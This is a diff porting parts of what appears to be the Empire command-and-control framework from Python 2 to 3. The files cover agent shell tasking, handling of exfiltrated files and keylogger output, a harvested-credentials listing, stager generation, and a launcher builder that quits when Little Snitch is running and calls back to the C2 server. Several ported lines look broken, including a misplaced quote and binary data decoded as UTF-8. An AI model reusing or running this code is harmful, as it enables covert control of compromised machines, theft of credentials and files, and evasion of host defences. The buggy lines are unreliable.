548 | 550 | moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info) |
567 | 569 | |
568 | 570 | modules = [] |
569 | 571 | |
570 | for moduleName, module in main.modules.modules.iteritems(): | |
572 | for moduleName, module in main.modules.modules.items(): | |
571 | 573 | if (searchTerm.lower() == '') or (searchTerm.lower() in moduleName.lower()): |
572 | 574 | |
573 | 575 | moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info) |
592 | 594 | |
593 | 595 | modules = [] |
594 | 596 | |
595 | for moduleName, module in main.modules.modules.iteritems(): | |
597 | for moduleName, module in main.modules.modules.items(): | |
596 | 598 | if (searchTerm.lower() == '') or (searchTerm.lower() in ("".join(module.info['Description'])).lower()): |
597 | 599 | |
598 | 600 | moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info) |
617 | 619 | |
618 | 620 | modules = [] |
619 | 621 | |
620 | for moduleName, module in main.modules.modules.iteritems(): | |
622 | for moduleName, module in main.modules.modules.items(): | |
621 | 623 | if (searchTerm.lower() == '') or (searchTerm.lower() in ("".join(module.info['Comments'])).lower()): |
622 | 624 | |
623 | 625 | moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info) |
642 | 644 | |
643 | 645 | modules = [] |
644 | 646 | |
645 | for moduleName, module in main.modules.modules.iteritems(): | |
647 | for moduleName, module in main.modules.modules.items(): | |
646 | 648 | if (searchTerm.lower() == '') or (searchTerm.lower() in ("".join(module.info['Author'])).lower()): |
647 | 649 | |
648 | 650 | moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info) |
731 | 733 | |
732 | 734 | listenerObject = main.listeners.loadedListeners[listener_type] |
733 | 735 | # set all passed options |
734 | for option, values in request.json.iteritems(): | |
735 | if type(values) == unicode: | |
736 | values = values.encode('utf8') | |
736 | for option, values in request.json.items(): | |
737 | if isinstance(values, bytes): | |
738 | values = values.decode('UTF-8') | |
737 | 739 | if option == "Name": |
738 | 740 | listenerName = values |
739 | 741 | |
764 | 766 | for activeAgent in activeAgentsRaw: |
765 | 767 | [ID, session_id, listener, name, language, language_version, delay, jitter, external_ip, internal_ip, username, high_integrity, process_name, process_id, hostname, os_details, session_key, nonce, checkin_time, lastseen_time, parent, children, servers, profile, functions, kill_date, working_hours, lost_limit, taskings, results] = activeAgent |
766 | 768 | |
767 | agents.append({"ID":ID, "session_id":session_id, "listener":listener, "name":name, "language":language, "language_version":language_version, "delay":delay, "jitter":jitter, "external_ip":external_ip, "internal_ip":internal_ip, "username":username, "high_integrity":high_integrity, "process_name":process_name, "process_id":process_id, "hostname":hostname, "os_details":os_details, "session_key":session_key.decode('latin-1').encode("utf-8"), "nonce":nonce, "checkin_time":checkin_time, "lastseen_time":lastseen_time, "parent":parent, "children":children, "servers":servers, "profile":profile,"functions":functions, "kill_date":kill_date, "working_hours":working_hours, "lost_limit":lost_limit, "taskings":taskings, "results":results}) | |
769 | agents.append({"ID":ID, "session_id":session_id, "listener":listener, "name":name, "language":language, "language_version":language_version, "delay":delay, "jitter":jitter, "external_ip":external_ip, "internal_ip":internal_ip, "username":username, "high_integrity":high_integrity, "process_name":process_name, "process_id":process_id, "hostname":hostname, "os_details":os_details, "session_key":session_key, "nonce":nonce, "checkin_time":checkin_time, "lastseen_time":lastseen_time, "parent":parent, "children":children, "servers":servers, "profile":profile,"functions":functions, "kill_date":kill_date, "working_hours":working_hours, "lost_limit":lost_limit, "taskings":taskings, "results":results}) | |
768 | 770 | |
769 | 771 | return jsonify({'agents' : agents}) |
770 | 772 |
351 | 351 | os.makedirs(save_path) |
352 | 352 | |
353 | 353 | # save the file out |
354 | f = open(save_path + "/" + filename, 'w') | |
354 | f = open(save_path + "/" + filename, 'wb') | |
355 | ||
355 | 356 | f.write(data) |
356 | 357 | f.close() |
357 | 358 | finally: |
358 | 359 | self.lock.release() |
359 | 360 | |
360 | 361 | # notify everyone that the file was downloaded |
361 | message = "[+] File {} from {} saved".format(path, sessionID) | |
362 | message = "\n[+] File {} from {} saved".format(path, sessionID) | |
362 | 363 | signal = json.dumps({ |
363 | 364 | 'print': True, |
364 | 365 | 'message': message |
612 | 613 | """ |
613 | 614 | Return agent results from the backend database. |
614 | 615 | """ |
615 | ||
616 | 616 | agent_name = sessionID |
617 | 617 | |
618 | 618 | # see if we were passed a name instead of an ID |
1059 | 1059 | """ |
1060 | 1060 | Add a task to the specified agent's buffer in the database. |
1061 | 1061 | """ |
1062 | ||
1063 | 1062 | agentName = sessionID |
1064 | 1063 | |
1065 | 1064 | # see if we were passed a name instead of an ID |
1120 | 1119 | f = open('%s/LastTask' % (self.installPath), 'w') |
1121 | 1120 | f.write(task) |
1122 | 1121 | f.close() |
1123 | ||
1124 | 1122 | return pk |
1125 | 1123 | |
1126 | 1124 | finally: |
1658 | 1656 | # process the packet and extract necessary data |
1659 | 1657 | responsePackets = packets.parse_result_packets(packet) |
1660 | 1658 | results = False |
1661 | ||
1662 | 1659 | # process each result packet |
1663 | 1660 | for (responseName, totalPacket, packetNum, taskID, length, data) in responsePackets: |
1664 | 1661 | # process the agent's response |
1665 | 1662 | self.process_agent_packet(sessionID, responseName, taskID, data) |
1666 | 1663 | results = True |
1667 | ||
1668 | 1664 | if results: |
1669 | 1665 | # signal that this agent returned results |
1670 | 1666 | message = "[*] Agent {} returned results.".format(sessionID) |
1760 | 1756 | |
1761 | 1757 | elif responseName == "TASK_SYSINFO": |
1762 | 1758 | # sys info response -> update the host info |
1759 | data = data.decode('utf-8') | |
1763 | 1760 | parts = data.split("|") |
1764 | 1761 | if len(parts) < 12: |
1765 | 1762 | message = "[!] Invalid sysinfo response from {}".format(sessionID) |
1769 | 1766 | }) |
1770 | 1767 | dispatcher.send(signal, sender="agents/{}".format(sessionID)) |
1771 | 1768 | else: |
1772 | print("sysinfo:",data) | |
1773 | 1769 | # extract appropriate system information |
1774 | listener = str(parts[1], 'utf-8') | |
1775 | domainname = str(parts[2], 'utf-8') | |
1776 | username = str(parts[3], 'utf-8') | |
1777 | hostname = str(parts[4], 'utf-8') | |
1778 | internal_ip = str(parts[5], 'utf-8') | |
1779 | os_details = str(parts[6], 'utf-8') | |
1780 | high_integrity = str(parts[7], 'utf-8') | |
1781 | process_name = str(parts[8], 'utf-8') | |
1782 | process_id = str(parts[9], 'utf-8') | |
1783 | language = str(parts[10], 'utf-8') | |
1784 | language_version = str(parts[11], 'utf-8') | |
1770 | listener = parts[1] | |
1771 | domainname = parts[2] | |
1772 | username = parts[3] | |
1773 | hostname = parts[4] | |
1774 | internal_ip = parts[5] | |
1775 | os_details = parts[6] | |
1776 | high_integrity = parts[7] | |
1777 | process_name = parts[8] | |
1778 | process_id = parts[9] | |
1779 | language = parts[10] | |
1780 | language_version = parts[11] | |
1785 | 1781 | if high_integrity == 'True': |
1786 | 1782 | high_integrity = 1 |
1787 | 1783 | else: |
1794 | 1790 | self.mainMenu.agents.update_agent_sysinfo_db(sessionID, listener=listener, internal_ip=internal_ip, username=username, hostname=hostname, os_details=os_details, high_integrity=high_integrity, process_name=process_name, process_id=process_id, language_version=language_version, language=language) |
1795 | 1791 | |
1796 | 1792 | sysinfo = '{0: <18}'.format("Listener:") + listener + "\n" |
1797 | sysinfo += '{0: <16}'.format("Internal IP:") + internal_ip + "\n" | |
1793 | sysinfo += '{0: <18}'.format("Internal IP:") + internal_ip + "\n" | |
1798 | 1794 | sysinfo += '{0: <18}'.format("Username:") + username + "\n" |
1799 | sysinfo += '{0: <16}'.format("Hostname:") + hostname + "\n" | |
1795 | sysinfo += '{0: <18}'.format("Hostname:") + hostname + "\n" | |
1800 | 1796 | sysinfo += '{0: <18}'.format("OS:") + os_details + "\n" |
1801 | 1797 | sysinfo += '{0: <18}'.format("High Integrity:") + str(high_integrity) + "\n" |
1802 | 1798 | sysinfo += '{0: <18}'.format("Process Name:") + process_name + "\n" |
1836 | 1832 | |
1837 | 1833 | elif responseName == "TASK_DOWNLOAD": |
1838 | 1834 | # file download |
1835 | if isinstance(data, bytes): | |
1836 | data = data.decode('UTF-8') | |
1837 | ||
1839 | 1838 | parts = data.split("|") |
1840 | 1839 | if len(parts) != 3: |
1841 | 1840 | message = "[!] Received invalid file download response from {}".format(sessionID) |
1847 | 1846 | else: |
1848 | 1847 | index, path, data = parts |
1849 | 1848 | # decode the file data and save it off as appropriate |
1850 | file_data = helpers.decode_base64(data) | |
1849 | file_data = helpers.decode_base64(data.encode('UTF-8')) | |
1851 | 1850 | name = self.get_agent_name_db(sessionID) |
1852 | 1851 | |
1853 | 1852 | if index == "0": |
1920 | 1919 | |
1921 | 1920 | |
1922 | 1921 | elif responseName == "TASK_CMD_WAIT_SAVE": |
1922 | ||
1923 | 1923 | # dynamic script output -> blocking, save data |
1924 | 1924 | name = self.get_agent_name_db(sessionID) |
1925 | 1925 | |
1926 | 1926 | # extract the file save prefix and extension |
1927 | prefix = data[0:15].strip() | |
1928 | extension = data[15:20].strip() | |
1927 | prefix = data[0:15].strip().decode('UTF-8') | |
1928 | extension = data[15:20].strip().decode('UTF-8') | |
1929 | 1929 | file_data = helpers.decode_base64(data[20:]) |
1930 | 1930 | |
1931 | 1931 | # save the file off to the appropriate path |
1953 | 1953 | return |
1954 | 1954 | |
1955 | 1955 | with open(savePath,"a+") as f: |
1956 | if isinstance(data, bytes): | |
1957 | data = data.decode('UTF-8') | |
1956 | 1958 | new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") |
1957 | 1959 | f.write(new_results) |
1958 | 1960 | else: |
2052 | 2054 | self.save_agent_log(sessionID, data) |
2053 | 2055 | message = "[+] Listener for '{}' updated to '{}'".format(sessionID, data) |
2054 | 2056 | signal = json.dumps({ |
2055 | 'print': True, | |
2057 | 'print': False, | |
2056 | 2058 | 'message': message |
2057 | 2059 | }) |
2058 | 2060 | dispatcher.send(signal, sender="agents/{}".format(sessionID)) |
52 | 52 | """ |
53 | 53 | |
54 | 54 | cur = self.conn.cursor() |
55 | ||
56 | 55 | # if we're returning a single credential by ID |
57 | 56 | if self.is_credential_valid(filterTerm): |
58 | 57 | cur.execute("SELECT * FROM credentials WHERE id=? limit 1", [filterTerm]) |
13 | 13 | from builtins import input |
14 | 14 | from builtins import str |
15 | 15 | from builtins import range |
16 | VERSION = "3.0 BC-Security Fork" | |
16 | ||
17 | VERSION = "3.0.3 BC-Security Fork" | |
17 | 18 | |
18 | 19 | from pydispatch import dispatcher |
19 | 20 | |
273 | 274 | |
274 | 275 | # generate the stager |
275 | 276 | menu.do_generate('') |
276 | print('empire.py: line 277') | |
277 | 277 | else: |
278 | 278 | messages.display_stager(targetStager) |
279 | 279 | |
683 | 683 | |
684 | 684 | else: |
685 | 685 | creds = self.credentials.get_credentials(filterTerm=filterTerm) |
686 | ||
686 | ||
687 | 687 | messages.display_credentials(creds) |
688 | 688 | |
689 | 689 | |
1857 | 1857 | if '{} returned results'.format(self.sessionID) in signal: |
1858 | 1858 | results = self.mainMenu.agents.get_agent_results_db(self.sessionID) |
1859 | 1859 | if results: |
1860 | print(helpers.color(results)) | |
1860 | print("\n" + helpers.color(results)) | |
1861 | 1861 | |
1862 | 1862 | |
1863 | 1863 | def default(self, line): |
2236 | 2236 | else: |
2237 | 2237 | # if we're uploading the file as a different name |
2238 | 2238 | uploadname = parts[1].strip() |
2239 | ||
2240 | 2239 | if parts[0] != "" and os.path.exists(parts[0]): |
2241 | 2240 | # Check the file size against the upload limit of 1 mb |
2242 | 2241 | |
2243 | 2242 | # read in the file and base64 encode it for transport |
2244 | open_file = open(parts[0], 'r') | |
2243 | open_file = open(parts[0], 'r', encoding="utf8", errors='ignore') | |
2245 | 2244 | file_data = open_file.read() |
2246 | 2245 | open_file.close() |
2247 | ||
2248 | 2246 | size = os.path.getsize(parts[0]) |
2247 | ||
2249 | 2248 | if size > 1048576: |
2250 | 2249 | print(helpers.color("[!] File size is too large. Upload limit is 1MB.")) |
2251 | 2250 | else: |
2252 | 2251 | # dispatch this event |
2253 | 2252 | message = "[*] Tasked agent to upload {}, {}".format(uploadname, helpers.get_file_size(file_data)) |
2253 | file_data = file_data.encode('UTF-8') | |
2254 | ||
2254 | 2255 | signal = json.dumps({ |
2255 | 2256 | 'print': True, |
2256 | 2257 | 'message': message, |
2266 | 2267 | |
2267 | 2268 | # upload packets -> "filename | script data" |
2268 | 2269 | file_data = helpers.encode_base64(file_data) |
2269 | data = uploadname + "|" + file_data | |
2270 | data = uploadname + "|" + file_data.decode("UTF-8") | |
2270 | 2271 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_UPLOAD", data) |
2271 | 2272 | else: |
2272 | 2273 | print(helpers.color("[!] Please enter a valid file path to upload")) |
2289 | 2290 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_IMPORT", script_data) |
2290 | 2291 | |
2291 | 2292 | # dispatch this event |
2292 | message = "[*] Tasked agent to import {}: {}".format(path, hashlib.md5(script_data).hexdigest()) | |
2293 | message = "[*] Tasked agent to import {}: {}".format(path, hashlib.md5(script_data.encode('utf-8')).hexdigest()) | |
2293 | 2294 | signal = json.dumps({ |
2294 | 2295 | 'print': False, |
2295 | 2296 | 'message': message, |
2296 | 2297 | 'import_path': path, |
2297 | 'import_md5': hashlib.md5(script_data).hexdigest() | |
2298 | 'import_md5': hashlib.md5(script_data.encode('utf-8')).hexdigest() | |
2298 | 2299 | }) |
2299 | 2300 | dispatcher.send(signal, sender="agents/{}".format(self.sessionID)) |
2300 | 2301 | |
2301 | 2302 | # update the agent log with the filename and MD5 |
2302 | msg = "Tasked agent to import %s : %s" % (path, hashlib.md5(script_data).hexdigest()) | |
2303 | msg = "Tasked agent to import %s : %s" % (path, hashlib.md5(script_data.encode('utf-8')).hexdigest()) | |
2303 | 2304 | self.mainMenu.agents.save_agent_log(self.sessionID, msg) |
2304 | 2305 | |
2305 | 2306 | # extract the functions from the script so we can tab-complete them |
2833 | 2834 | if '{} returned results'.format(self.sessionID) in signal: |
2834 | 2835 | results = self.mainMenu.agents.get_agent_results_db(self.sessionID) |
2835 | 2836 | if results: |
2836 | print(helpers.color(results)) | |
2837 | ||
2837 | print("\n" + helpers.color(results)) | |
2838 | ||
2838 | 2839 | def default(self, line): |
2839 | 2840 | "Default handler" |
2841 | ||
2840 | 2842 | line = line.strip() |
2841 | 2843 | parts = line.split(' ') |
2842 | ||
2844 | ||
2843 | 2845 | if len(parts) > 0: |
2844 | 2846 | # check if we got an agent command |
2845 | 2847 | if parts[0] in self.agentCommands: |
2846 | 2848 | shellcmd = ' '.join(parts) |
2847 | 2849 | # task the agent with this shell command |
2848 | 2850 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", shellcmd) |
2851 | ||
2852 | # dispatch this event | |
2853 | message = "[*] Tasked agent to run command {}".format(line) | |
2854 | signal = json.dumps({ | |
2855 | 'print': False, | |
2856 | 'message': message, | |
2857 | 'command': line | |
2858 | }) | |
2859 | dispatcher.send(signal, sender="agents/{}".format(self.sessionID)) | |
2860 | ||
2849 | 2861 | # update the agent log |
2850 | 2862 | msg = "Tasked agent to run command " + line |
2851 | 2863 | self.mainMenu.agents.save_agent_log(self.sessionID, msg) |
2852 | 2864 | else: |
2853 | 2865 | print(helpers.color("[!] Command not recognized.")) |
2854 | 2866 | print(helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands.")) |
2855 | ||
2867 | ||
2868 | ||
2856 | 2869 | def do_help(self, *args): |
2857 | 2870 | "Displays the help menu or syntax for particular commands." |
2858 | 2871 | SubMenu.do_help(self, *args) |
2927 | 2940 | "Change an agent's active directory" |
2928 | 2941 | |
2929 | 2942 | line = line.strip() |
2930 | ||
2931 | 2943 | if line != "": |
2932 | 2944 | # have to be careful with inline python and no threading |
2933 | 2945 | # this can cause the agent to crash so we will use try / cath |
2934 | 2946 | # task the agent with this shell command |
2935 | 2947 | if line == "..": |
2936 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", 'import os; os.chdir(os.pardir); print "Directory stepped down: %s"' % (line)) | |
2948 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", 'import os; os.chdir(os.pardir); print("Directory stepped down: %s")' % (line)) | |
2937 | 2949 | else: |
2938 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", 'import os; os.chdir("%s"); print "Directory changed to: %s"' % (line, line)) | |
2950 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", 'import os; os.chdir("%s"); print("Directory changed to: %s)"' % (line, line)) | |
2939 | 2951 | |
2940 | 2952 | # dispatch this event |
2941 | 2953 | message = "[*] Tasked agent to change active directory to {}".format(line) |
3010 | 3022 | |
3011 | 3023 | if delay == "": |
3012 | 3024 | # task the agent to display the delay/jitter |
3013 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global delay; global jitter; print 'delay/jitter = ' + str(delay)+'/'+str(jitter)") | |
3025 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global delay; global jitter; print('delay/jitter = ' + str(delay)+'/'+str(jitter))") | |
3014 | 3026 | |
3015 | 3027 | # dispatch this event |
3016 | 3028 | message = "[*] Tasked agent to display delay/jitter" |
3032 | 3044 | self.mainMenu.agents.set_agent_field_db("delay", delay, self.sessionID) |
3033 | 3045 | self.mainMenu.agents.set_agent_field_db("jitter", jitter, self.sessionID) |
3034 | 3046 | |
3035 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global delay; global jitter; delay=%s; jitter=%s; print 'delay/jitter set to %s/%s'" % (delay, jitter, delay, jitter)) | |
3047 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global delay; global jitter; delay=%s; jitter=%s; print('delay/jitter set to %s/%s')" % (delay, jitter, delay, jitter)) | |
3036 | 3048 | |
3037 | 3049 | # dispatch this event |
3038 | 3050 | message = "[*] Tasked agent to delay sleep/jitter {}/{}".format(delay, jitter) |
3169 | 3181 | "Task an agent to use a shell command." |
3170 | 3182 | |
3171 | 3183 | line = line.strip() |
3172 | ||
3173 | 3184 | if line != "": |
3174 | 3185 | # task the agent with this shell command |
3175 | 3186 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", str(line)) |
4471 | 4482 | # if we need to write binary output for a .dll |
4472 | 4483 | if ".dll" in savePath: |
4473 | 4484 | out_file = open(savePath, 'wb') |
4474 | out_file.write(bytearray(stagerOutput)) | |
4485 | ||
4486 | if isinstance(stagerOutput, bytes): | |
4487 | stagerOutput = stagerOutput.decode('latin-1') | |
4488 | ||
4489 | out_file.write(bytearray(stagerOutput,encoding='utf8')) | |
4475 | 4490 | out_file.close() |
4476 | 4491 | else: |
4477 | 4492 | # otherwise normal output |
4478 | 4493 | out_file = open(savePath, 'w') |
4494 | ||
4495 | if isinstance(stagerOutput, bytes): | |
4496 | stagerOutput = stagerOutput.decode('latin-1') | |
4497 | ||
4479 | 4498 | out_file.write(stagerOutput) |
4480 | 4499 | out_file.close() |
4481 | 4500 |
168 | 168 | Generate an AES cipher object, pull out the IV from the data |
169 | 169 | and return the unencrypted data. |
170 | 170 | """ |
171 | ||
172 | 171 | if len(data) > 16: |
173 | 172 | backend = default_backend() |
174 | 173 | IV = data[0:16] |
176 | 175 | decryptor = cipher.decryptor() |
177 | 176 | pt = depad(decryptor.update(data[16:]) + decryptor.finalize()) |
178 | 177 | return pt |
179 | ||
180 | 178 | |
181 | 179 | def verify_hmac(key, data): |
182 | 180 | """ |
200 | 198 | """ |
201 | 199 | Decrypt the data, but only if it has a valid MAC. |
202 | 200 | """ |
203 | ||
204 | 201 | if len(data) > 32 and verify_hmac(key, data): |
205 | 202 | if isinstance(key, str): |
206 | 203 | key = bytes(key, 'latin-1') |
213 | 210 | Generate a random new 128-bit AES key using OS' secure Random functions. |
214 | 211 | """ |
215 | 212 | punctuation = '!#$%&()*+,-./:;<=>?@[\]^_`{|}~' |
216 | return ''.join(random.sample(string.ascii_letters + string.digits + '!#$%&()*+,-./:;<=>?@[\]^_`{|}~', 32)) | |
213 | rng = random.SystemRandom() | |
214 | return ''.join(rng.sample(string.ascii_letters + string.digits + '!#$%&()*+,-./:;<=>?@[\]^_`{|}~', 32)) | |
217 | 215 | |
218 | 216 | |
219 | 217 | def rc4(key, data): |
805 | 805 | From http://stackoverflow.com/questions/2941995/python-ignore-incorrect-padding-error-when-base64-decoding |
806 | 806 | """ |
807 | 807 | missing_padding = 4 - len(data) % 4 |
808 | if isinstance(data, str): | |
809 | data = data.encode('UTF-8') | |
810 | ||
808 | 811 | if missing_padding: |
809 | 812 | data += b'=' * missing_padding |
810 | 813 |
202 | 202 | name = listenerObject.options['Name']['Value'] |
203 | 203 | nameBase = name |
204 | 204 | |
205 | if isinstance(name, bytes): | |
206 | name = name.decode('UTF-8') | |
207 | ||
205 | 208 | if not listenerObject.validate_options(): |
206 | 209 | return |
207 | 210 |
183 | 183 | print(" ---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------") |
184 | 184 | |
185 | 185 | for agent in agents: |
186 | ||
187 | 186 | if str(agent['high_integrity']) == '1': |
188 | 187 | # add a * to the username if it's high integrity |
189 | 188 | agent['username'] = '*' + str(agent['username']) |
475 | 474 | domain = cred[2] |
476 | 475 | username = cred[3] |
477 | 476 | password = cred[4] |
478 | host = cred[5] | |
479 | ||
477 | if isinstance(cred[5], bytes): | |
478 | host = cred[5].decode('latin-1') | |
479 | else: | |
480 | host = cred[5] | |
480 | 481 | print(" %s%s%s%s%s%s" % ('{0: <8}'.format(credID), '{0: <11}'.format(credType), '{0: <25}'.format(domain), '{0: <17}'.format(username), '{0: <17}'.format(host), password)) |
481 | 482 | |
482 | 483 | print('') |
277 | 277 | RC4IV = data[0 + offset:4 + offset] |
278 | 278 | RC4data = data[4 + offset:20 + offset] |
279 | 279 | routingPacket = encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), RC4data) |
280 | sessionID = routingPacket[0:8].decode('UTF-8') | |
280 | try: | |
281 | sessionID = routingPacket[0:8].decode('UTF-8') | |
282 | except: | |
283 | sessionID = routingPacket[0:8].decode('latin-1') | |
281 | 284 | |
282 | 285 | # B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long |
283 | 286 | (language, meta, additional, length) = struct.unpack("=BBHL", routingPacket[8:]) |
303 | 306 | break |
304 | 307 | |
305 | 308 | offset += 20 + length |
306 | ||
307 | 309 | return results |
308 | 310 | |
309 | 311 | else: |
358 | 360 | rc4EncData = encryption.rc4(key, data) |
359 | 361 | # return an rc4 encyption of the routing packet, append an HMAC of the packet, then the actual encrypted data |
360 | 362 | if isinstance(encData, str) and sys.version[0] != "2": |
361 | encData = encData.encode('UTF-8') | |
363 | encData = encData.encode('Latin-1') | |
362 | 364 | |
363 | 365 | packet = RC4IV + rc4EncData + encData |
364 | 366 | return packet |
36 | 36 | |
37 | 37 | #---- constants |
38 | 38 | |
39 | _SIGNATURE = 'L\x00\x00\x00' | |
40 | _GUID = '\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00F' | |
39 | _SIGNATURE = b'L\x00\x00\x00' | |
40 | _GUID = b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00F' | |
41 | 41 | _LINK_INFO_HEADER_DEFAULT = 0x1C |
42 | 42 | _LINK_INFO_HEADER_OPTIONAL = 0x24 |
43 | 43 | |
175 | 175 | return datetime(year, month, day, hour, minute, second) |
176 | 176 | |
177 | 177 | def write_byte(val, buf): |
178 | buf.write(pack('<B', val)) | |
178 | buf.write(pack('<B', val).decode('UTF-8')) | |
179 | 179 | |
180 | 180 | def write_short(val, buf): |
181 | buf.write(pack('<H', val)) | |
181 | buf.write(pack('<H', val).decode('latin-1')) | |
182 | 182 | |
183 | 183 | def write_int(val, buf): |
184 | buf.write(pack('<I', val)) | |
184 | buf.write(pack('<I', val).decode('UTF-8')) | |
185 | 185 | |
186 | 186 | def write_double(val, buf): |
187 | buf.write(pack('<Q', val)) | |
187 | buf.write(pack('<Q', val).decode('UTF-8')) | |
188 | 188 | |
189 | 189 | def write_cstring(val, buf, padding=False): |
190 | 190 | #val = val.encode('unicode-escape').replace('\\\\', '\\') |
191 | 191 | val = val.encode('cp1252') |
192 | buf.write(val + '\x00') | |
192 | buf.write((val + b'\x00').decode('UTF-8')) | |
193 | 193 | if padding and not len(val) % 2: |
194 | 194 | buf.write('\x00') |
195 | 195 | |
196 | 196 | def write_cunicode(val, buf): |
197 | 197 | uni = val.encode('utf-16-le') |
198 | buf.write(uni + '\x00\x00') | |
198 | buf.write((uni + b'\x00\x00').decode('UTF-8')) | |
199 | 199 | |
200 | 200 | def write_sized_string(val, buf, str=True): |
201 | 201 | size = len(val) |
211 | 211 | if str: |
212 | 212 | ret += val.encode('utf-16-le') |
213 | 213 | else: |
214 | ret += val | |
214 | ret += val.encode('UTF-8') | |
215 | 215 | return ret |
216 | 216 | |
217 | 217 | def put_bits(bits, target, start, count, length=16): |
427 | 427 | entry_type = self.type |
428 | 428 | short_name_len = len(self.short_name) + 1 |
429 | 429 | try: |
430 | self.short_name.decode("ascii") | |
430 | if isinstance(self.short_name, bytes): | |
431 | self.short_name.decode("ascii") | |
431 | 432 | short_name_is_unicode = False |
432 | 433 | short_name_len += short_name_len % 2 # padding |
433 | 434 | except (UnicodeEncodeError, UnicodeDecodeError): |
624 | 625 | ret += pack('<I',_SHOW_COMMAND_IDS[self._show_command]) |
625 | 626 | ret += pack('<B',0) #hotkey |
626 | 627 | ret += pack('<B',0) #hotkey |
627 | ret += ('\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') # reserved | |
628 | ret += (b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') # reserved | |
629 | print(ret) | |
628 | 630 | |
629 | 631 | if self.link_flags.has_shell_item_id_list: |
630 | 632 | siil = self.shell_item_id_list.bytes |
631 | 633 | ret += pack('<H',len(siil)) |
632 | ret += siil | |
634 | ret += siil.encode('UTF-8') | |
633 | 635 | # TOFIX / TOINVESTIGATE |
634 | 636 | #if self.link_flags.has_link_info: |
635 | 637 | #self._link_info.write(lnk) |
644 | 646 | if self.link_flags.has_icon: |
645 | 647 | ret += ret_sized_string(self.icon, self.link_flags.is_unicode) |
646 | 648 | |
647 | ret += ('\x00\x00\x00\x00') # header_size | |
649 | ret += (b'\x00\x00\x00\x00') # header_size | |
648 | 650 | return ret |
649 | 651 | |
650 | 652 | def write(self, lnk): |
99 | 99 | Abstracted functionality that invokes the generate_launcher() method for a given listener, |
100 | 100 | if it exists. |
101 | 101 | """ |
102 | ||
102 | 103 | if not listenerName in self.mainMenu.listeners.activeListeners: |
103 | 104 | print(helpers.color("[!] Invalid listener: %s" % (listenerName))) |
104 | 105 | return '' |
418 | 418 | |
419 | 419 | if language.startswith('py'): |
420 | 420 | # Python |
421 | ||
422 | 421 | launcherBase = 'import sys;' |
423 | 422 | if "https" in host: |
424 | 423 | # monkey patch ssl woohooo |
430 | 429 | launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n" |
431 | 430 | launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n" |
432 | 431 | launcherBase += "out, err = ps.communicate()\n" |
433 | launcherBase += "if re.search(\"Little Snitch\", out):\n" | |
432 | launcherBase += "if re.search(\"Little Snitch\", out.decode('UTF-8')):\n" | |
434 | 433 | launcherBase += " sys.exit()\n" |
435 | 434 | except Exception as e: |
436 | 435 | p = "[!] Error setting LittleSnitch in stager: " + str(e) |
440 | 439 | profile = listenerOptions['DefaultProfile']['Value'] |
441 | 440 | userAgent = profile.split('|')[1] |
442 | 441 | |
443 | launcherBase += "import urllib2;\n" | |
442 | launcherBase += "import urllib.request as urllib;\n" | |
444 | 443 | launcherBase += "UA='%s';" % (userAgent) |
445 | 444 | launcherBase += "server='%s';t='%s';" % (host, stage0) |
446 | 445 | |
447 | 446 | # prebuild the request routing packet for the launcher |
448 | 447 | routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', |
449 | 448 | meta='STAGE0', additional='None', encData='') |
450 | b64RoutingPacket = base64.b64encode(routingPacket) | |
451 | ||
452 | launcherBase += "req=urllib2.Request(server+t);\n" | |
449 | ||
450 | b64RoutingPacket = base64.b64encode(routingPacket).decode('UTF-8') | |
451 | ||
452 | launcherBase += "req=urllib.Request(server+t);\n" | |
453 | ||
453 | 454 | # add the RC4 packet to a cookie |
454 | 455 | launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket) |
455 | 456 | |
460 | 461 | headerValue = header.split(':')[1] |
461 | 462 | # launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue) |
462 | 463 | launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue) |
463 | ||
464 | ||
464 | 465 | if proxy.lower() != "none": |
465 | 466 | if proxy.lower() == "default": |
466 | launcherBase += "proxy = urllib2.ProxyHandler();\n" | |
467 | launcherBase += "proxy = urllib.ProxyHandler();\n" | |
467 | 468 | else: |
468 | 469 | proto = proxy.split(':')[0] |
469 | launcherBase += "proxy = urllib2.ProxyHandler({'" + proto + "':'" + proxy + "'});\n" | |
470 | ||
470 | launcherBase += "proxy = urllib.ProxyHandler({'" + proto + "':'" + proxy + "'});\n" | |
471 | ||
471 | 472 | if proxyCreds != "none": |
472 | 473 | if proxyCreds == "default": |
473 | launcherBase += "o = urllib2.build_opener(proxy);\n" | |
